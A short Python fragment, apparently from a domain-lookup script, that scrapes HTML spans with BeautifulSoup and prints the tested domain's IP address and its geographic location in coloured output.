    label = b"IP\xe7\x9a\x84\xe7\x89\xa9\xe7\x90\x86\xe4\xbd\x8d\xe7\xbd\xae"  # "IP的物理位置"
    for tag in soup.find_all('span', class_='Whwtdhalf w50-0'):
        text = tag.get_text()
        # The original tested `find(label)`, which is falsy only at index 0,
        # i.e. exactly the "starts with the label" case.
        if not text.encode('utf-8').startswith(label):
            print(Vcolors.OKGREEN + '被测域名的IP为:' + new_ip + '\n' + '被测域名的归属地为:' + text + Vcolors.ENDC)
--------------------------------------------------------------------------------